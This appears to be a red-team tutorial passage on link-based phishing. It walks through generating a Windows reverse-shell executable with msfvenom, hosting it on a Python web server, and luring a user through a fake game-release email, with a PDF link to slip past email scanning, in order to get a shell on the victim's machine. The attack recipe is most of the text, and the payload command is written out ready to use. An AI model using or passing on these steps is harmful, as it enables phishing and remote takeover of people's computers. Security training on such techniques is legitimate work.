Links: Binaries

The use of binaries has highly decreased but this is still a good example on how Users download EXE files and give access to attackers, remember the weakest link is not sometimes a Machine but the User.

I will demonstrate a simple chat email that will contain a link to download the executable, that way it evades the Email Security measures in scanning the binary. This will simply give the user a prompt to download or run the binary.

The use of msfvenom here is very simple as this tool is widely known in the security industry but it's also great for creating fast payloads. You can combine different methods of packaging, obfuscation or stripping to make your payload more undetectable. This attack as well can be considered an Attachment as I will use the Link on a PDF file attached on the Email but the main attack vector will still be a Link.

Will create a simple binary payload utilizing msfvenom:

msfvenom --platform windows --arch x64 --payload windows/x64/shell/reverse_tcp LHOST=<YOUR IP> LPORT=<YOUR PORT> --format exe --out payload.ex

We can host this payload on a webserver and send the full link on your phishing pretext. A simple email communicating to the user about the New Game that just got out to stores.

(Don't worry I would've clicked it as well.)

Once clicking the Link the User will be prompted to download the payload and from here it should be enough to have it run it.

In the following example I hosted the payload using the python simple http webserver. You can start this by using the following command: python3 -m http.server Once we get the user to execute the payload we will receive a shell back to our machine.

A simple technique but very effective to gain us a Shell, you won't see this technique so much or probably never but this used to be a very effective and successful technique.

We implemented a Link onto our Email and have the user download a binary and gain Execution.